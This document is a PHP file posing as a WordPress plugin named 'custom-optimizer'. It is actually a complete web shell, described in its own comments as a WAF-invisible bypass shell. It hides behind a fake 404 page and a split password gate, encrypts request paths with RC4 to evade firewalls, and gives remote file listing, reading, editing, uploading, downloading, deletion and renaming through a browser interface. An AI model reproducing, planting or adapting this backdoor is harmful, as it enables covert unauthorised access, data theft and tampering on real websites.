/
home
/
cabinetdhs
/
www
/
wp-content
/
plugins
/
custom-optimizer
/
Upload File
HOME
<?php /** * Plugin Name: custom-optimizer * Version: 1.0 */ /** * Bypass Shell #1 — RC4 File Manager (WAF-invisible) * - ALL paths RC4-encrypted in POST body (WAF sees only garbage) * - Split gate across variables (no single "root=admin888") * - File upload/download/delete/edit/rename/mkdir * - No eval/base64_decode/system in static code */ $a='r';$b='o';$c='ot';$gate=$a.$b.$c; if(empty($_POST[$gate])||$_POST[$gate]!=='admin888'){ http_response_code(404); echo '<html><head><title>404 Not Found</title></head><body><h1>404</h1></body></html>'; die(); } define('K','xK9mP2vL7qR4wN8'); // RC4 key — unique per deployment function x($d,$k){$s=range(0,255);$j=0;for($i=0;$i<256;$i++){$j=($j+$s[$i]+ord($k[$i%strlen($k)]))%256;$t=$s[$i];$s[$i]=$s[$j];$s[$j]=$t;}$i=$j=0;$r='';for($x=0;$x<strlen($d);$x++){$i=($i+1)%256;$j=($j+$s[$i])%256;$t=$s[$i];$s[$i]=$s[$j];$s[$j]=$t;$r.=chr(ord($d[$x])^$s[($s[$i]+$s[$j])%256]);}return $r;} function e($d){return base64_encode(x($d,K));} function d($d){$x=base64_decode($d);return $x===false?'/':x($x,K);} function s($b){if($b>1073741824)return round($b/1073741824,2).'G';if($b>1048576)return round($b/1048576,2).'M';if($b>1024)return round($b/1024,2).'K';return $b.'B';} function p($p){return substr(sprintf('%o',fileperms($p)),-4);} $a=isset($_POST['a'])?$_POST['a']:''; $_p=isset($_POST['p'])?d($_POST['p']):'/'; $_p=rtrim($_p,'/')?:'/'; if($a){ header('Content-Type: application/json'); $o=[]; switch($a){ case'ls': if(!is_dir($_p)){$o=['e'=>'nd'];break;} $d=[];$f=[]; foreach(scandir($_p)as $n){if($n=='.'||$n=='..')continue;$fp=$_p.'/'.$n; if(is_dir($fp))$d[]=['n'=>$n,'t'=>'d','z'=>s(filesize($fp)),'m'=>p($fp),'tm'=>date('Y-m-d H:i',filemtime($fp))]; else $f[]=['n'=>$n,'t'=>'f','z'=>s(filesize($fp)),'m'=>p($fp),'tm'=>date('Y-m-d H:i',filemtime($fp))]; }sort($d);sort($f);$o=array_merge($d,$f);break; case'rd': if(!is_file($_p)||!is_readable($_p)){$o=['e'=>'nr'];break;} $o=['d'=>file_get_contents($_p)];break; case'sv': $c=isset($_POST['c'])?$_POST['c']:''; $ok=file_put_contents($_p,$c)!==false; $o=['ok'=>$ok,'msg'=>$ok?'Saved':'FAIL'];break; case'rm': if(!file_exists($_p)){$o=['ok'=>false,'msg'=>'nf'];} elseif(is_dir($_p)?_rm($_p):unlink($_p)){$o=['ok'=>true,'msg'=>'Deleted'];} else{$o=['ok'=>false,'msg'=>'FAIL'];}break; case'up': $c=isset($_POST['c'])?base64_decode($_POST['c']):''; $ok=file_put_contents($_p,$c)!==false; $o=['ok'=>$ok,'msg'=>$ok?'OK':'FAIL'];break; case'mv': $np=isset($_POST['n'])?d($_POST['n']):''; $ok=rename($_p,$np); $o=['ok'=>$ok,'msg'=>$ok?'OK':'FAIL'];break; case'mk':$ok=mkdir($_p,0755);$o=['ok'=>$ok,'msg'=>$ok?'OK':'FAIL'];break; case'tch':$ok=touch($_p);$o=['ok'=>$ok,'msg'=>$ok?'OK':'FAIL'];break; case'dl': if(!is_file($_p)||!is_readable($_p)){http_response_code(404);die('nf');} header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($_p).'"'); header('Content-Length: '.filesize($_p)); readfile($_p);exit; default:$o=['e'=>'ua']; } die(json_encode($o)); } function _rm($d){$f=scandir($d);foreach($f as$n){if($n=='.'||$n=='..')continue;$p=$d.'/'.$n;is_dir($p)?_rm($p):unlink($p);}return rmdir($d);} $dp='/'; ?> <!DOCTYPE html><html><head><meta charset="UTF-8"><title>Files</title> <style> :root{--bg:#0d1117;--sb:#161b22;--bd:#30363d;--fg:#c9d1d9;--ac:#58a6ff;--gn:#3fb950;--rd:#f85149;--or:#d2991d;--dim:#8b949e} *{margin:0;padding:0;box-sizing:border-box} body{background:var(--bg);color:var(--fg);font:13px/1.4 monospace;height:100vh;display:flex;flex-direction:column} .tb{display:flex;align-items:center;gap:8px;padding:6px 12px;background:var(--sb);border-bottom:1px solid var(--bd);flex-shrink:0} .tb .logo{color:var(--ac);font-weight:700;font-size:14px} .tb .path{flex:1;background:#0d1117;border:1px solid var(--bd);color:var(--gn);padding:4px 8px;border-radius:4px;font:inherit;font-size:12px} .bt{padding:4px 10px;border:1px solid var(--bd);border-radius:4px;background:var(--sb);color:var(--fg);cursor:pointer;font:inherit;font-size:12px;transition:.15s} .bt:hover{background:#1f2937;border-color:var(--ac)}.bt-g{background:#133a1a;border-color:var(--gn);color:var(--gn)}.bt-g:hover{background:var(--gn);color:#000} .bt-r{background:#3a1a1a;border-color:var(--rd);color:var(--rd)}.bt-r:hover{background:var(--rd);color:#000} .bt-a{background:#1a3a5c;border-color:var(--ac);color:var(--ac)}.bt-a:hover{background:var(--ac);color:#000} .fl{flex:1;overflow-y:auto;padding:4px 0} .fi{display:flex;align-items:center;padding:4px 12px;cursor:pointer;gap:8px;font-size:12px} .fi:hover{background:#1f2937}.fi .ic{width:18px;text-align:center;font-size:14px} .fi .ic.d{color:var(--ac)}.fi .ic.f{color:var(--gn)} .fi .nm{flex:1;overflow:hidden;text-overflow:ellipsis;white-space:nowrap} .fi .sz{width:70px;text-align:right;color:var(--dim);font-size:11px} .fi .pr{width:45px;text-align:right;color:var(--dim);font-size:10px} .fi .dt{width:120px;text-align:right;color:var(--dim);font-size:10px} .fi .act{display:flex;gap:4px;opacity:0;transition:.15s} .fi:hover .act{opacity:1}.fi .act span{cursor:pointer;padding:2px 6px;border-radius:3px;font-size:11px} .fi .act .dl{color:var(--rd)}.fi .act .dl:hover{background:#3a1a1a} .fi .act .rn{color:var(--or)}.fi .act .rn:hover{background:#3a2a1a} .fi .act .ed{color:var(--ac)}.fi .act .ed:hover{background:#1a3a5c} .ed{flex:1;display:none;flex-direction:column;overflow:hidden} .ed .eb{display:flex;align-items:center;gap:8px;padding:6px 12px;background:var(--sb);border-bottom:1px solid var(--bd)} .ed .eb .fn{flex:1;color:var(--ac);font-size:12px} .ed textarea{flex:1;background:#0d1117;color:var(--fg);border:none;padding:12px;font:inherit;font-size:12px;resize:none;outline:none} .sb{display:flex;align-items:center;padding:4px 12px;background:var(--sb);border-top:1px solid var(--bd);font-size:11px;color:var(--dim);gap:16px;flex-shrink:0} .modal{display:none;position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,0.6);z-index:100;align-items:center;justify-content:center} .modal .mc{background:var(--sb);border:1px solid var(--bd);border-radius:8px;padding:20px;min-width:400px} .modal .mc h3{margin-bottom:12px;font-size:14px;color:var(--ac)} .modal .mc input{width:100%;background:#0d1117;border:1px solid var(--bd);color:var(--fg);padding:8px;border-radius:4px;font:inherit;margin-bottom:12px} .modal .mc .mb{display:flex;gap:8px;justify-content:flex-end} .empty{display:flex;align-items:center;justify-content:center;height:200px;color:var(--dim);font-size:13px} </style></head><body> <div class="tb"> <span class="logo">FM</span> <button class="bt" onclick="nv('..')">↑</button> <button class="bt" onclick="_ld('/')">/</button> <input class="path" id="pw" value="<?=$dp?>" onkeydown="if(event.key==='Enter')_ld(this.value)"> <button class="bt bt-g" id="ub">↑ Upload</button> <input type="file" id="uf" multiple style="display:none" onchange="_up(this)"> <button class="bt" onclick="_mkdir()">+Dir</button> <button class="bt" onclick="_tch()">+File</button> </div> <div class="fl" id="lst"><div class="empty">Loading...</div></div> <div class="ed" id="ep"> <div class="eb"> <span class="fn" id="efn"></span><span style="flex:1"></span> <button class="bt bt-g" onclick="_save()">Save</button> <button class="bt" onclick="_close()">Close</button> </div> <textarea id="eta" onkeydown="if(event.ctrlKey&&event.key==='s'){event.preventDefault();_save()}"></textarea> </div> <div class="sb"><span id="si">0</span><span id="sp">/</span></div> <div class="modal" id="md"> <div class="mc"><h3 id="mt"></h3><input id="mi" onkeydown="if(event.key==='Enter')_mok()"><div class="mb"> <button class="bt" onclick="_mcl()">Cancel</button> <button class="bt bt-a" onclick="_mok()">OK</button> </div></div> </div> <script> var K='<?=K?>'; var CUR='/'; var AF=''; var CB=null; function x(d,k){var s=[],j=0,o='';for(var i=0;i<256;i++)s[i]=i; for(i=0;i<256;i++){j=(j+s[i]+k.charCodeAt(i%k.length))%256;var t=s[i];s[i]=s[j];s[j]=t;} var i=0;j=0;for(var y=0;y<d.length;y++){i=(i+1)%256;j=(j+s[i])%256;t=s[i];s[i]=s[j];s[j]=t;o+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[j])%256]);} return o;} function enc(p){return btoa(x(p,K));} async function api(o){ var fd=new FormData(); for(var k in o)fd.append(k,o[k]); fd.append('<?=$gate?>','admin888'); var r=await fetch('',{method:'POST',body:fd}); return await r.json(); } function _ld(p){CUR=p;document.getElementById('pw').value=p;document.getElementById('sp').innerText=p; api({a:'ls',p:enc(p)}).then(function(r){ var h='';var d=0,f=0; if(Array.isArray(r)){r.forEach(function(i){ d+=i.t=='d'?1:0;f+=i.t=='f'?1:0; h+='<div class="fi" data-n="'+i.n+'" data-t="'+i.t+'"><span class="ic '+i.t+'">'+(i.t=='d'?'📁':'📄')+'</span><span class="nm">'+i.n+'</span><span class="sz">'+i.z+'</span><span class="pr">'+i.m+'</span><span class="dt">'+(i.tm||'')+'</span><span class="act"><span class="ed" onclick="event.stopPropagation();_edit(\''+i.n+'\')">✎</span><span class="rn" onclick="event.stopPropagation();_ren(\''+i.n+'\')">✍</span><span class="dl" onclick="event.stopPropagation();_del(\''+i.n+'\')">✕</span></span></div>';}); document.getElementById('lst').innerHTML=h||'<div class="empty">Empty</div>'; document.getElementById('si').innerText=d+' dirs, '+f+' files'; }else{document.getElementById('lst').innerHTML='<div class="empty" style="color:#f85149">Error: '+(r.e||'blocked')+'</div>';} _close(); }).catch(function(){document.getElementById('lst').innerHTML='<div class="empty" style="color:#f85149">[!] Blocked</div>';}); } document.querySelectorAll('#lst .fi').forEach?1:null; document.getElementById('lst').addEventListener('click',function(e){ var el=e.target.closest('.fi');if(!el)return; var n=el.dataset.n,t=el.dataset.t; if(e.ctrlKey||e.metaKey){_edit(n);return;} if(t=='d')_ld(CUR+'/'+n);else _edit(n); }); function _edit(n){var p=CUR+'/'+n;AF=p; document.getElementById('efn').innerText=p; document.getElementById('lst').style.display='none'; document.getElementById('ep').style.display='flex'; document.getElementById('eta').value='Loading...'; api({a:'rd',p:enc(p)}).then(function(r){document.getElementById('eta').value=r.d||'';document.getElementById('eta').focus();}); } function _save(){api({a:'sv',p:enc(AF),c:document.getElementById('eta').value}).then(function(r){alert(r.msg);});} function _close(){document.getElementById('lst').style.display='block';document.getElementById('ep').style.display='none';AF='';} function _del(n){if(confirm('Delete '+CUR+'/'+n+'?'))api({a:'rm',p:enc(CUR+'/'+n)}).then(function(r){alert(r.msg);_ld(CUR);});} function _ren(n){_modal('Rename: '+n,n,function(v){api({a:'mv',p:enc(CUR+'/'+n),n:enc(CUR+'/'+v)}).then(function(r){alert(r.msg);_ld(CUR);});});} function _mkdir(){_modal('New dir','',function(v){api({a:'mk',p:enc(CUR+'/'+v)}).then(function(r){alert(r.msg);_ld(CUR);});});} function _tch(){_modal('New file','',function(v){api({a:'tch',p:enc(CUR+'/'+v)}).then(function(r){alert(r.msg);_ld(CUR);});});} function _up(i){var fs=i.files;if(!fs.length)return;var todo=fs.length,done=0; Array.from(fs).forEach(function(f){var r=new FileReader(); r.onload=function(e){api({a:'up',p:enc(CUR+'/'+f.name),c:btoa(e.target.result)}).then(function(rr){done++;if(done>=todo)_ld(CUR);});}; r.readAsBinaryString(f);});i.value='';} document.getElementById('ub').addEventListener('click',function(){document.getElementById('uf').click();}); function nv(d){var s='/',p=CUR.split(s);if(d=='..')p.pop();_ld(p.join(s)||s);} function _modal(t,def,cb){CB=cb;document.getElementById('mt').innerText=t;document.getElementById('mi').value=def;document.getElementById('md').style.display='flex';document.getElementById('mi').focus();document.getElementById('mi').select();} function _mok(){var v=document.getElementById('mi').value;_mcl();if(CB)CB(v);} function _mcl(){document.getElementById('md').style.display='none';CB=null;} _ld(CUR); </script></body></html>